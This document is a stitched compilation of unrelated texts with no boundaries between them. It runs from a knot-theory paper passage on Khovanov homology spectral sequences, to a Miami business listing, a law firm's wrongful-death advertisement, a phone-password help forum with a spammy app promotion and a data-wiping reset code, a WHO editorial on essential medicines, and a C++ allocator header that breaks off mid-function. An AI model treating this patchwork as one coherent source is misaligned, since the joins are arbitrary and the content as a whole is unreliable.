Alishahi and Dowlin [@AD:Lee] proved that if the unknotting number of a (nontrivial) knot is one or two, then the Lee spectral sequence collapses at the second page. However, many knots in Example \[example:AH\] have unknotting number greater than two, and thus the results from [@AD:Lee] cannot be used for those knots. Examples \[example:MM\], \[example:56\], and \[example:78\] describe knots where the page at which the relevant spectral sequence collapses gives a nontrivial lower bound on the alternation number of the knot. Before describing the examples in detail, we remind the reader of some of the properties of the Lee and Bar-Natan spectral sequences. The map on the $E_r$ page of the Lee spectral sequence increases the homological grading by one and the polynomial grading by $4r$. Similarly, the map on the $E_r$ page of the Bar-Natan spectral sequence increases the homological grading by one and the polynomial grading by $2r$. Khovanov homology with $\mathbb{F}_2$ coefficients splits as a direct sum of two copies of the reduced Khovanov homology with $\mathbb{F}_2$ coefficients; that is, $Kh^{i,j}(K;\mathbb{F}_2) \cong \widetilde{Kh}^{i,j-1}(K;\mathbb{F}_2)\oplus\widetilde{Kh}^{i,j+1}(K;\mathbb{F}_2)$. The Bar-Natan spectral sequence has this same behavior of splitting into two copies; see [@Turner:BN] for details. \[example:AH\] For any pair of positive integers $m$ and $n$, de los Angeles Hernandez [@Hernandez:Alternation] constructed the hyperbolic knot $K(m,n)$ whose diagram is depicted in Figure \[figure:K(m,n)\] and whose alternation number is one. Therefore, Theorem \[theorem:LeeMain\] implies that the Lee spectral sequence of $K(m,n)$ collapses at or before the second page, and Theorem \[theorem:BNMain\] implies that the Bar-Natan spectral sequence of $K(m,n)$ collapses at or before the third page. Moreover, the width of the Khovanov homology of $K(m,n)$, that is the fewest number of adjacent $j-2i$ diagonals supporting $Kh(K(m,n))$, is $n+2$ [@Hernandez:Alternation Lemma 3.2]. Recall that if the unknotting number of a (nontrivial) knot is one or two, then the Lee spectral sequence collapses at the second page [@AD:Lee]. If $n+2<m$, then one can see that $K(m,n)$ has unknotting number greater than two, as follows. Dasbach and Lowrance [@DL:Turaev] proved that the signature of a knot $K$ with diagram $D$ satisfies the inequality $$s_A(D) -c_+(D) - 1 \leq \sigma(K) \leq -s_B(D) + c_-(D) + 1,$$ where $s_A(D)$ and $s_B(D)$ are the number of components in the all-$A$ and all-$B$ Kauffman states, respectively, and $c_+(D)$ and $c_-(D)$ are the number of positive and negative crossings in $D$. Applying this inequality to the diagram of $K(m,n)$, we see that $-2m-2n\leq \sigma(K) \leq -2m +2n$. Because $|\sigma(K)| \leq 2u(K)$, if $n+2< m$, then $u(K(m,n))> 2$. Hence, the result in [@AD:Lee] cannot be used for knots $K(m,n)$ with $n+2< m$. $$\begin{tikzpicture}[scale=.7, thick] \def\gap{.2cm} \coordinate (A) at (0,2); \coordinate (A1) at (.5,2.4); \coordinate (A2) at (.5,1.6); \coordinate (B) at (2,2); \coordinate (B1) at (1.5,2.4); \coordinate (B2) at (1.5,1.6); \coordinate (C) at (3,1.25); \coordinate (D) at (3,.5); \coordinate (E) at (4,2); \coordinate (F) at (5,1); \coordinate (G) at (6,2); \coordinate (H) at (8.5,2); \coordinate (I) at (9.5,1); \coordinate (J) at (10.5,2); \coordinate (L1) at (-.5,0); \coordinate (L2) at (-.5,1.5); \coordinate (L3) at (-.5,2.5); \coordinate (L4) at (-.5,3); \coordinate (L5) at (-.5,3.5); \coordinate (L6) at (-.5,4); \coordinate (R1) at (11,.5); \coordinate (R2) at (11,1.5); \coordinate (R3) at (11,2.5); \coordinate (R4) at (11,3); \coordinate (R5) at (11,3.5); \coordinate (R6) at (11,4); \coordinate (M1) at (6.5,.5); \coordinate (M2) at (6.5,1.6); \coordinate (M3) at (6.5,2.4); \coordinate (M4) at (8,.5); \coordinate (M5) at (8,1.6); \coordinate (M6) at (8,2.4); \fill (1,2) circle (.05cm); \fill (.8,2) circle (.05cm); \fill (1.2,2) circle (.05cm); \fill (7.25,1.25) circle (.05cm); \fill (7.05,1.25) circle (.05cm); \fill (7.45,1.25) circle (.05cm); \draw[dashed] (3.5,0) rectangle (6.5,2.6); \draw[dashed, xshift = 4.5cm] (3.5,0) rectangle (6.5,2.6); \draw [ thick, decoration={ brace, mirror, amplitude = 10pt, raise=0.5cm }, decorate ] (-.25,2) -- (2.25,2); \draw (1,.5) node{\footnotesize{$2m+1$}}; \draw [ thick, decoration={ brace, mirror, amplitude = 10pt, raise=0.5cm }, decorate ] (3.5,.5) -- (11,.5); \draw (7.25,-1) node{\footnotesize{$2n$}}; \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (I) circle (\gap); \end{pgfinterruptboundingbox} \draw[thick] (I) to [out = 225, in = 0] (M4); \end{scope} \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (G) circle (\gap); \end{pgfinterruptboundingbox} \draw[thick] (G) to [out = 45, in = 180] (M3); \end{scope} \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (F) circle (\gap); \path [invclip] (G) circle (\gap); \end{pgfinterruptboundingbox} \draw[thick] (F) to [out = 45, in = 225] (G); \end{scope} \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (E) circle (\gap); \end{pgfinterruptboundingbox} \draw[thick] (E) to [out = 45, in = 135] (G) to [out = -45, in = 180] (M2); \end{scope} \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (C) circle (\gap); \path [invclip] (E) circle (\gap); \end{pgfinterruptboundingbox} \draw[thick] (C) to [out = 45, in = 225] (E); \end{scope} \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (C) circle (\gap); \path [invclip] (F) circle (\gap); \end{pgfinterruptboundingbox} \draw[thick] (C) to [out = 225, in = 135] (D) to [out =-45, in =225](F); \end{scope} \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (B) circle (\gap); \end{pgfinterruptboundingbox} \draw[thick] (B) to [out = 45, in = 135] (E) to [out = -45, in =135] (F) to [out = -45, in=180] (M1); \end{scope} \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (B) circle (\gap); \end{pgfinterruptboundingbox} \draw[thick] (B2) to [out = 0, in = 225] (B); \end{scope} \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (D) circle (\gap); \end{pgfinterruptboundingbox} \draw[thick] (D) to [out = 45, in = -45] (C) to [out = 135, in = -45] (B) to [out = 135, in =0] (B1); \end{scope} \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (D) circle (\gap); \end{pgfinterruptboundingbox} \draw[thick] (M6) to [out = 0, in = 135] (H) to [out = -45, in = 135] (I) to [out = -45, in = 180] (R1) to [out= 0, in = 0] (R6) to [out = 180, in = 0] (L6) to [out = 180, in =180] (L1) to [out = 0, in = 225, looseness = .7] (D); \end{scope} \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (J) circle (\gap); \path [invclip] (I) circle (\gap); \end{pgfinterruptboundingbox} \draw[thick] (J) to [out = 225, in = 45] (I); \end{scope} \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (H) circle (\gap); \end{pgfinterruptboundingbox} \draw[thick] (H) to [out = 225, in = 0] (M5); \end{scope} \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (A) circle (\gap); \path [invclip] (H) circle (\gap); \end{pgfinterruptboundingbox} \draw[thick] (A) to [out = 225, in = 0] (L2) to [out = 180, in = 180] (L5) to [out = 0, in = 180] (R5) to [out = 0, in = 0] (R2) to [out = 180, in =-45] (J) to [out =135, in = 45, looseness = 1] (H); \end{scope} \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (J) circle (\gap); \end{pgfinterruptboundingbox} \draw[thick] (A2) to [out = 180, in = -45, looseness = 1] (A) to [out = 135, in = 0] (L3) to [out = 180, in = 180] (L4) to [out = 0, in = 180] (R4) to [out=0, in = 0] (R3) to [out = 180, in = 45] (J); \end{scope} \begin{scope} \begin{pgfinterruptboundingbox} \path [invclip] (A) circle (\gap); \end{pgfinterruptboundingbox} \draw [thick] (A1) to [out = 180, in = 225, looseness = 1] (A); \end{scope} \end{tikzpicture}$$ In Examples \[example:MM\], \[example:56\], and \[example:78\], we show the Khovanov homology of certain knots. The number in the $(i,j)$ entry of the table in Figure \[figure:MM\] is the rank of $Kh^{i,j}(K;R)$. All Khovanov homology computations for these examples are obtained using the program “JavaKh-v2" available on the Knot Atlas [@knotatlas]. ![The knot on the left has a positive full twist in the rectangle labeled $+1$. A portion of its Khovanov homology with $\mathbb{Q}$ coefficients is on the right. The highlighted yellow generator survives to the third page of the spectral sequence but not to the $E_\infty$ page.[]{data-label="figure:MM"}](MM.png) \[example:MM\] Manolescu and Marengon [@MM:Knight] gave an example of a knot $K$ whose Lee spectral sequence over $\mathbb{Q}$ does not collapse at the second page. This knot $K$ and a portion of its Khovanov homology $Kh(K,\mathbb{Q})$ appear in Figure \[figure:MM\]. Because $Kh^{1,1}(K;\mathbb{Q})$ is nontrivial, while $Kh^{0,-3}(K;\mathbb{Q})$ and $Kh^{2,5}(K;\mathbb{Q})$ are trivial, it follows that ${p_{\textnormal{Lee}}}(K;\mathbb{Q})>2$. Changing the two crossings of $K$ circled in Figure \[figure:MM\] transforms the knot into the figure-eight knot, and thus $\alt(K)\leq2$. Using now Theorem \[theorem:LeeMain\], it follows that $\alt(K)=2$. \[example:56\] The Lee spectral sequence for the $(5,6)$-torus knot $T_{5,6}$ with $\mathbb{Q}$ coefficients collapses at the second page; however, this is not the case when the coefficients are $\mathbb{F}_3$. Table \[figure:T56\] shows the Khovanov homology of $T_{5,6}$ with $\mathbb{F}_3$ coefficients. Because $Kh^{13,43}(T_{5,6};\mathbb{F}_3)$ is nontrivial while $Kh^{12,39}(T_{5,6};\mathbb{F}_3)$ and $Kh^{14,47}(T_{5,6};\mathbb{F}_3)$ are trivial, it follows that ${p_{\textnormal{Lee}}}(T_{5,6};\mathbb{F}_3)>2$. Theorem \[theorem:LeeMain\] implies that $2\leq {d_{\textnormal{thin}}}(T_{5,6};\mathbb{F}_3) \leq \alt(T_{5,6})$. ![image](KhT-5-6-mod3){width="50.00000%"} \[example:78\] The Khovanov homology of $T_{7,8}$ with $\mathbb{F}_2$ coefficients is shown in Table \[figure:T78\]. Since $i=26$ is the maximum homological grading where $Kh^{i,j}(T_{7,8};\mathbb{F}_2)$ is nontrivial, the summands $Kh^{26,79}(T_{7,8};\mathbb{F}_2)$ and $Kh^{26,81}(T_{7,8};\mathbb{F}_2)$ must be paired with the summands $Kh^{25,75}(T_{7,8};\mathbb{F}_2)$ and $Kh^{25,77}(T_{7,8};\mathbb{F}_2)$ on the third page of Bar-Natan spectral sequence. Consequently, the summands $Kh^{25,79}(T_{7,8};\mathbb{F}_2)$ and $Kh^{25,81}(T_{7,8};\mathbb{F}_2)$ must be paired with the summands $Kh^{24,71}(T_{7,8};\mathbb{F}_2)$ and $Kh^{24,73}(T_{7,8};\mathbb{F}_2)$ on the fourth page of the Bar-Natan spectral sequence. Therefore $\pBN(T_{7,8})\geq 4$, and thus Theorem \[theorem:BNMain\] implies that $2\leq {d_{\textnormal{thin}}}(T_{7,8};\mathbb{F}_2)\leq \alt(T_{7,8})$. ![image](KhT-7-8-mod2.png){width="80.00000%"} Proofs {#s43} ------ The Lee and Bar-Natan spectral sequences both arise as spectral sequences of filtered complexes. The filtration comes from adding the Khovanov differential to different boundary maps that increase the polynomial/quantum grading. The Lee and Bar-Natan spectral sequences arise from maps $\dlee:CKh^{i,j}(D;R)\to CKh^{i+1,j+4}(D;R)$ and $\dBN:CKh^{i,j}(D;\mathbb{F}_2) \to CKh^{i+1,j+2}(D;\mathbb{F}_2)$, respectively. For any knot diagram $D$, the homology of $(CKh(D;R),d+\dlee)$ is isomorphic to $R\oplus R$ situated in homological grading zero, and similarly, the homology of $(CKh(D;\mathbb{F}_2),d+\dBN)$ is isomorphic to $\mathbb{F}_2\oplus\mathbb{F}_2$ situated in homological grading zero. Bar-Natan [@BN05] constructed a deformation of Khovanov homology using coefficients in $\mathbb{F}_2[h]$ for a formal variable $h$ instead of $\mathbb{F}_2$ and using the differential $d+h\dBN$ instead of the usual Khovanov differential $d$. Turner later viewed the Bar-Natan construction through the lens of spectral sequences as described above. Alishahi and Dowlin [@AD:Lee] similarly encapsulated the Lee endomorphism as part of a deformed complex with coefficients in $\mathbb{Q}[X,t]/(X^2=t)$, where the differential in this complex is $d+ t \dlee$. Just as with Lee’s endomorphism, one can replace $\mathbb{Q}$ with $\mathbb{F}_p$, for any odd $p$, and all of the results of [@AD:Lee] hold without changing their proofs. An element $\alpha$ in the homology of Bar-Natan’s complex is *$h$-torsion of order $n$* if $h^n\alpha=0$ but $h^{n-1}\alpha\neq 0$. Let $\mathfrak{u}_h(K)$ be the maximum order of any torsion element in the homology of Bar-Natan’s complex. Then $\mathfrak{u}_h(K) + 1 = \pBN(K)$ [@Alishahi:BN Lemma 3.2]. Similarly, an element $\alpha$ in the deformed Lee homology over $R=\mathbb{Q}$ or $\mathbb{F}_p$, for an odd prime $p$, is *$X$-torsion of order $n$* (respectively *$t$-torsion of order $m$*) if $X^n\alpha = 0$ but $X^{n-1}\alpha\neq 0$ (respectively $t^m\alpha=0$ but $t^{m-1}\alpha\neq 0$). Alishahi and Dowlin proved the following facts about $\mathfrak{u}_X(K;\mathbb{Q})$ and $\mathfrak{u}_t(K;\mathbb{Q})$. We observed that the proofs of these facts when $R = \mathbb{Q}$ also apply when using $\mathbb{F}_p$ coefficients. As such, we state the following for $R=\mathbb{Q}$ or $\mathbb{F}_p$, where $p$ is an odd prime. 1. If $Kh(K;R)$ is homologically thin, then $\mathfrak{u}_X(K;R)=1$; 2. $|\mathfrak{u}_X(K_+;R)-\mathfrak{u}_X(K_-;R)|\leq 1$, where $K_+$ and $K_-$ are knots differing by a single crossing change; 3. $\lceil \mathfrak{u}_X(K;R)/2\rceil = \mathfrak{u}_t(K;R)$, and 4. $\mathfrak{u}_t(K)+1 = {p_{\textnormal{Lee}}}(K;R)$. We are now in a position to prove Theorems \[theorem:LeeMain\], \[theorem:BNMain\], and \[theorem:Turaev\]. Let ${d_{\textnormal{thin}}}(K;R)=d$. Hence, there is a sequence of knots $K=K_0, K_1, \dots, K_d$ such that $K_{i+1}$ is obtained from $K_i$ via a crossing change for all $i=0,\dots, d-1$, and $Kh(K_d;R)$ is homologically thin. Item (1) above implies that $\mathfrak{u}_X(K_d;R)=1$, and item (2) implies that $\mathfrak{u}_X(K;R)\leq d+1$. Then item (3) implies that $\mathfrak{u}_t(K;R) =\left \lceil \frac{\mathfrak{u}_X(K;R)}{2}\right\rceil\leq \left \lceil \frac{d+1}{2}\right\rceil.$ Finally, item (4) implies that ${p_{\textnormal{Lee}}}(K;R) = \mathfrak{u}_t(K;R)+1 \leq \left\lceil\frac{d+3}{2}\right\rceil$, as desired. The second inequality in the theorem follows at once from the fact that ${d_{\textnormal{thin}}}(K;R) \leq \alt(K)$, as seen in the beginning of this section. Let ${d_{\textnormal{thin}}}(K;R)=d$. Hence there is a sequence of knots $K=K_0, K_1, \dots, K_d$ such that $K_{i+1}$ is obtained from $K_i$ via a crossing change for $i=0,\dots, d-1$, and $Kh(K_d;\mathbb{F}_2)$ is homologically thin. By Alishahi [@Alishahi:BN], since $K_i$ and $K_{i+1}$ differ by a crossing change, it follows that $|\mathfrak{u}_h(K_i) - \mathfrak{u}_h(K_{i+1})|\leq 1$, and thus $\mathfrak{u}_h(K)\leq d+ \mathfrak{u}_h(K_d)$. Since $Kh(K_d;\mathbb{F}_2)$ is homologically thin, $\pBN(K_d) \leq 2$. But $\pBN(K_d)=\mathfrak{u}_h(K_d)+1$, and thus $\mathfrak{u}_h(K_d)\leq 1$. It follows that $\mathfrak{u}_h(K)\leq d+ 1$, and therefore $\pBN(K)\leq d+2$, as desired. The *width* $w(Kh(K;R))$ of the Khovanov homology over a ring $R$ is defined as $$w(Kh(K;R)) = 1 + \frac{1}{2}\left(\max\{j-2i~|~Kh^{i,j}(K;R)\neq 0\} - \min\{j-2i~|~Kh^{i,j}(K;R)\neq 0\}\right).$$ Champanerkar, Kofman, and Stoltzfus [@CKS:Turaev] proved that $w(Kh(K;R))\leq g_T(K)+2$. Since the Lee differential on the $E_r$ page increases the homological grading $i$ by one and the polynomial grading $j$ by $4r$, if ${p_{\textnormal{Lee}}}(K;R)=n$, then $w(Kh(K;R))\geq2n-2$. Therefore $2{p_{\textnormal{Lee}}}(K;R) \leq g_T(K)+4$, as desired. Similarly, since the Bar-Natan differential on the $E_r$ page increases the homological grading by one and the polynomial grading by $2r$, if $\pBN(K)=n$, then $w(Kh(K;\mathbb{F}_2))\geq n$. Therefore, $\pBN(K)\leq g_T(K)+2$.
Odalys Development Inc About Odalys Development Inc is located at the address 8400 Sw 8th St in Miami, Florida 33144. They can be contacted via phone at (305) 264-1818 for pricing, hours and directions. Odalys Development Inc specializes in Apartments, Buildings, Residential Property. Odalys Development Inc has an annual sales volume of 501K - 999,999. . Odalys Development Inc provides Property Sales, Additions, Development to it's customers. For maps and directions to Odalys Development Inc view the map to the right. For reviews of Odalys Development Inc see below.
Seeking Justice for Wrongful-Death Survivors Dedicated wrongful-death lawyers serve the Midwest and nation at large At Townsend & Townsend, LLP, we strongly believe that negligent parties must be held responsible if they cause the death of another. We are zealous advocates who are dedicated to ensuring that you receive the maximum compensation possible for your loss — not only to help your family move forward, but also to punish negligent individuals and companies for their actions. Our Indianapolis wrongful-death lawyers have 90 combined years of experience in representing survivors in lawsuits. Pursuing damages Prompt action is critical to obtaining damages after the death of a family member. Under Indiana law, you have a limited period of time to file a wrongful death suit. Our professionals are well-versed in the courtroom tactics that the opposition uses in such trials to attempt to limit their liability, and we counter their arguments with carefully planned responses that are designed to protect your rights. We work hard to ensure that you receive compensation for: Loss of love, affection and companionship Medical costs Funeral expenses Mental anguish Loss of future earnings Loss of protection and guidance Benefits lost — including medical insurance — because of the victim’s death Our attorneys can also help you recover damages for pain and suffering if your family member did not file a personal injury lawsuit before their passing. Have a wealth of knowledge by your side Every attorney with Townsend & Townsend, LLP has an in-depth understanding of how to construct wrongful-death lawsuits in court. We frequently work with private investigators and experts to establish liability, obtain testimonials from witnesses, collect and preserve evidence, and perform a myriad of other tasks to build a case on your behalf. Our law firm has tried wrongful-death lawsuits related to: Auto accidents Truck accidents Defective products Lack of proper security Medical malpractice Birth injuries Nursing home abuse and neglect Traumatic brain injuries Workplace accidents Motorcycle accidents Aviation accidents Although we settle suits before going to court — if doing so is likely to produce a favorable result — we do not hesitate to litigate cases, when necessary. Contact our Indianapolis wrongful-death law firm Townsend & Townsend, LLP provides committed assistance to those who are dealing with the devastation of a loved one’s death. If you have lost a family member because of someone else’s irresponsibility, put our tenacity to work for you. To begin the process of filing a wrongful-death lawsuit, call us at 317-264-4444 or contact us online. Our firm operates on a contingency-fee basis, meaning that you pay nothing for our services unless you receive a settlement or verdict.
1 Suggested Answer Hi, a 6ya expert can help you resolve that issue over the phone in a minute or two. best thing about this new service is that you are never placed on hold and get to talk to real repairmen in the US. the service is completely free and covers almost anything you can think of (from cars to computers, handyman, and even drones). click here to download the app (for users in the US for now) and get all the help you need.goodluck! Tell us some more! Your answer needs to include more details to help people.You can't post answers that contain an email address.Please enter a valid email address.The email address entered is already associated to an account.Login to postPlease use English characters only. Related Questions: This sort of situation is not all that rare. the most straightforward way to handle this is to call your carrier. It's just 611 on the phone (if you can call at all) for AT&T, likely the same on other carriers. Or, worst case, a land line and look the number up for tech support. In any case, just tell them what happened and that you need to reset your password and re-obtain the info on your email, etc. They should be able to walk you through it, after you provide a few bits of ID info to make sure you're not an outsider pranking someones phone account. So the password can be reset with a button combination made on your controller, but that sequence can only be given by the people at Microsoft Technical Support. Write down the serial number of the Xbox (find that on a sticker on the back of the machine), and call 1-800-4MYXBOX. They will likely ask you several questions about who plays it, gamertags, billing address, and so on, but they will then walk you through how to reset the password. I can't give you what that password is, as everyone has a different one depending on the serial number of the console. you can enter the hard reset code but that will delete everything on the phone the code is *2767*3855# i haven't been able to find the password reset for the F48.The default code for the Samsung F480 is 12345678 Hi, did you try removing the mains plug, and leaving it off for about 24 hours ?? not sure whether these have a CMOS battery or not. option 2, if it,s a premium ( with hard Drive ) try removing the hard-drive. Password/Timer probably setting on there rather than the Console. Mike @ Compurepair. You can protect the phone against unauthorised use with a phone password. The phone will require the password on power-up. 1. In Idle mode, press <Menu> and select Settings → Security → Change password. 2. Enter the default password, 00000000, and press <OK>. 3. Enter a new 4- to 8-digit password and press <OK>. 4. Enter the new password again and press <OK>. 5. Select Phone lock. 6. Select Enable. 7. Enter the password and press <OK>. eight zeros is the default, if you've changed it, you'll need the unblocking key from your service provider. Or if you've still got the box the phone came in, you'll find the puk number on there.
In 1977, the World Health Organization (WHO) published its first Model List of Essential Medicines.[@R1] This year, the Expert Committee for the Selection and Use of Medicines will consider requests to include high-cost medicines for cancer, hepatitis C, multidrug-resistant tuberculosis and new oral anticoagulants on the model list. These applications challenge perceptions of essential medicines and raise questions about how to address issues of cost and affordability for countries when making decisions at the global level. Essential medicines are those that satisfy the priority health-care needs of the population.[@R2]^,^[@R3] In addition to public health relevance, essential medicines are selected with due regard to evidence on efficacy and safety, and comparative cost--effectiveness. Methods for the selection of essential medicines were reviewed by WHO's Executive Board in 2001.[@R3] The Executive Board specifically noted that absolute treatment cost should not be a reason to reject a proposed addition to the model list if criteria for benefit and public health relevance are met. In practice, affordability has been changed from a precondition for listing an essential medicine to a consequence that must be managed after the decision to list.[@R2] Yet considerations of costs and budget impact -- along with registration status of the medicine, the feasibility of its use in various clinical settings and the need for monitoring -- must also influence global decision-making. A single approach to determining the affordability of new medicines is unlikely to succeed. Enabling access to cost-effective, yet potentially unaffordable, therapies will require particular consideration by the expert committee and new and better-coordinated actions at a global level. Tools such as incremental cost-effectiveness analysis can inform country-level decisions on adding a new medicine to a formulary or a reimbursement list. However, these methods do not address the issues of budget impact or affordability of a medicine. Experience suggests that in the absence of competition, options may be limited. Other tools such as those of WHO-CHOICE (CHOosing Interventions that are Cost--Effective) may help national policy-makers decide what is a reasonable price to pay for a medicine.[@R4] The challenge is to provide access to effective medicines without creating ad hoc vertical programmes and, at the same time, to avoid diverting funds from other important health-care services. Regional pooled procurement mechanisms, price controls, dedicated funding for specific needs, differential pricing and licence agreements can be effective ways of managing costs. Previous expert committees have recognized the message that comes with identifying a medicine as essential. In some cases, medicines have been included in the core list to underscore their importance, for example, antiretrovirals in 2002.[@R5] In other cases, the model list has been used to stimulate the entry of new manufacturers for products that are not widely available, such as with zinc sulfate in 2005 and rectal artesunate in 2009. Inclusion of effective but expensive medicines in the model list may also focus the attention of all stakeholders on the need to increase affordability and access to essential medicines. In 2013, the expert committee defined public health relevance to encompass overall incidence and prevalence of diseases as well as diseases that are specific to certain regions and diseases that are uncommon but for which there are effective medicines.[@R6] This broader framework allows the committee to include medicines for comparatively rare conditions such as leukaemia. The committee's main criteria for inclusion in the list are the magnitude of clinical benefit and a favourable risk--benefit profile determined through a systematic method of evidence synthesis and appraisal.[@R7] Estimates of the magnitude of the benefit are particularly pertinent for medicines for cancer, given the small gains in life expectancy offered by some new and expensive treatments. Previous expert committee decisions confirm the preference for listing treatments that offer cure or effective disease management over those that offer only marginal benefit. There have been calls for changes to regulatory assessments to ensure that only medicines offering clinically relevant improvements in cancer survival, or large clinical benefit, receive marketing approval.[@R8]^,^[@R9] The American Society of Clinical Oncology proposes minimum benefit thresholds for the design of clinical trials,[@R10] while the European Society for Medical Oncology is working to develop tools to assess the clinical benefits of cancer treatments. It is yet to be determined whether the expert committee will suggest a minimum threshold of benefit for cancer medicines, but prioritization according to the magnitude of benefit is a guiding principle that can assist countries in developing their national essential medicines lists. Two novel agents against tuberculosis, bedaquiline and delamanid, achieved regulatory approval based on promising, though limited, data from clinical trials. The trials used sputum culture conversion after the first few months of treatment as a surrogate marker of outcome. WHO issued interim guidance on the use of bedaquiline and delamanid for multidrug-resistant tuberculosis,[@R11]^,^[@R12] due to the public health relevance and severity of the condition and the lack of alternative treatment options. Mechanisms will be needed to ensure access to -- and safe use of -- these medicines while further evidence on efficacy and safety from phase III clinical trials is generated. The model list uses a classification of core and complementary medicines. This does not imply that only core medicines should be procured by the public system, while complementary medicines are optional. The core list includes the minimum medicines needed for a basic health-care system, while the complementary medicines list includes medicines for diseases that require more specialized diagnostic or monitoring facilities, medical care, and training.[@R6] The model list can be adapted to meet national needs and health priorities. Its principles and approaches are equally relevant to high-, middle-, and low-income countries and have increasing relevance as countries implement medicines benefits packages as part of universal health coverage. The next expert committee (in its April 2015 meeting) will need to consider how to realize the global health benefits of new medicines for which affordability is a major issue. None declared.
/******************************************************************************* * thrill/mem/aligned_allocator.hpp * * Copied and modified from STXXL https://github.com/stxxl/stxxl, which is * distributed under the Boost Software License, Version 1.0. * * Part of Project Thrill - http://project-thrill.org * * Copyright (C) 2002 Roman Dementiev <dementiev@mpi-sb.mpg.de> * Copyright (C) 2009 Andreas Beckmann <beckmann@cs.uni-frankfurt.de> * Copyright (C) 2016 Timo Bingmann <tb@panthema.net> * * All rights reserved. Published under the BSD-2 license in the LICENSE file. ******************************************************************************/ #pragma once #ifndef THRILL_MEM_ALIGNED_ALLOCATOR_HEADER #define THRILL_MEM_ALIGNED_ALLOCATOR_HEADER #include <thrill/common/logger.hpp> #include <thrill/mem/allocator_base.hpp> #include <cassert> #include <cstdlib> #include <memory> #define THRILL_DEFAULT_ALIGN 4096 namespace thrill { namespace mem { template <typename MustBeInt> struct AlignedAllocatorSettings { static bool may_use_realloc_; }; template <typename MustBeInt> bool AlignedAllocatorSettings<MustBeInt>::may_use_realloc_ = false; template <typename Type = char, typename BaseAllocator = std::allocator<char>, size_t Alignment = THRILL_DEFAULT_ALIGN> class AlignedAllocator : public tlx::AllocatorBase<Type> { static constexpr bool debug = false; static_assert(sizeof(typename BaseAllocator::value_type) == 1, "BaseAllocator must be a char/byte allocator"); public: using value_type = Type; using pointer = Type *; using const_pointer = const Type *; using reference = Type&; using const_reference = const Type&; using size_type = std::size_t; using difference_type = std::ptrdiff_t; //! C++11 type flag using is_always_equal = std::false_type; //! Return allocator for different type. template <typename U> struct rebind { using other = AlignedAllocator<U, BaseAllocator>; }; //! Construct with base allocator explicit AlignedAllocator(const BaseAllocator& base = BaseAllocator()) : base_(base) { } //! copy-constructor AlignedAllocator(const AlignedAllocator&) noexcept = default; //! copy-constructor from a rebound allocator template <typename OtherType> AlignedAllocator(const AlignedAllocator<OtherType>& other) noexcept : base_(other.base()) { } //! copy-assignment operator AlignedAllocator& operator = (const AlignedAllocator&) noexcept = default; //! Attempts to allocate a block of storage with a size large enough to //! contain n elements of member type value_type, and returns a pointer to //! the first element. pointer allocate(size_type n, const void* /* hint */ = nullptr) { if (n > this->max_size()) throw std::bad_alloc(); return static_cast<pointer>(allocate_bytes(n * sizeof(Type))); } //! Releases a block of storage previously allocated with member allocate //! and not yet released. void deallocate(pointer p, size_type n) noexcept { deallocate_bytes(p, n * sizeof(Type)); } //! Compare to another allocator of same type template <typename Other> bool operator == (const AlignedAllocator<Other>& other) const noexcept { return (base_ == other.base_); } //! Compare to another allocator of same type template <typename Other> bool operator != (const AlignedAllocator<Other>& other) const noexcept { return (base_ != other.base_); } /**************************************************************************/ void * allocate_bytes(size_t size, size_t meta_info_size = 0); void deallocate_bytes(void* ptr, size_t size, size_t meta_info_size = 0) noexcept; const BaseAllocator& base() const { return base_; } private: //! base allocator BaseAllocator base_; }; // meta_info_size > 0 is needed for array allocations that have overhead // // meta_info // aligned begin of data unallocated behind data // v v v // ----===============#MMMM========================------ // ^ ^^ ^ // buffer result result+m_i_size+size // pointer to buffer // (---) unallocated, (===) allocated memory template <typename Type, typename BaseAllocator, size_t Alignment> inline void* AlignedAllocator<Type, BaseAllocator, Alignment>::allocate_bytes( size_t size, size_t meta_info_size) { LOG << "aligned_alloc<" << Alignment << ">(), size = " << size << ", meta info size = " << meta_info_size; // malloc()/realloc() variant that frees the unused amount of memory // after the data area of size 'size'. realloc() from valgrind does not // preserve the old memory area when shrinking, so out-of-bounds // accesses can't be detected easily. // Overhead: about Alignment bytes. size_t alloc_size = Alignment + sizeof(char*) + meta_info_size + size; char* buffer = reinterpret_cast<char*>(base_.allocate(alloc_size)); if (buffer == nullptr) return nullptr; char* reserve_buffer = buffer + sizeof(char*) + meta_info_size; char* result = reserve_buffer + Alignment - (((size_t)reserve_buffer) % (Alignment)) - meta_info_size; LOG << "aligned_alloc<" << Alignment << ">() address " << static_cast<void*>(result) << " lost " << (result - buffer) << " bytes"; // -tb: check that there is space for one char* before the "result" pointer // delivered to the user. this char* is set below to the beginning of the // allocated area. assert(long(result - buffer) >= long(sizeof(char*))); #if 0 // free unused memory behind the data area // so access behind the requested size can be recognized size_t realloc_size = (result - buffer) + meta_info_size + size; if (realloc_size < alloc_size && AlignedAllocatorSettings<int>::may_use_realloc_) { char* realloced = static_cast<char*>(std::realloc(buffer, realloc_size)); if (buffer != realloced) { // hmm, realloc does move the memory block around while shrinking, // might run under valgrind, so disable realloc and retry LOG1 << "mem::aligned_alloc: disabling realloc()"; std::free(realloced); AlignedAllocatorSettings<int>::may_use_realloc_ = false; return allocate(size, meta_info_size); } assert(result + size <= buffer + realloc_size); } #endif *((reinterpret_cast<char**>(result)) - 1) = buffer; LOG << "aligned_alloc<" << Alignment << ">(), allocated at " << static_cast<void*>(buffer) << " returning " << static_cast<void*>(result); LOG << "aligned_alloc<" << Alignment << ">(size = " << size << ", meta info size = " << meta_info_size << ") => buffer = " << static_cast<void*>(buffer) << ", ptr = " << static_cast<void*>(result); return result; } template <typename Type, typename BaseAllocator, size_t Alignment> inline void AlignedAllocator<Type, BaseAllocator, Alignment>::deallocate_bytes( void* ptr, size_t size, size_t meta_info_size) noexcept { if (!ptr) return; char* buffer = *((reinterpret_cast<char**>(ptr)) - 1); size_t alloc_size = Alignment + sizeof(char*) + meta_info_size + size; 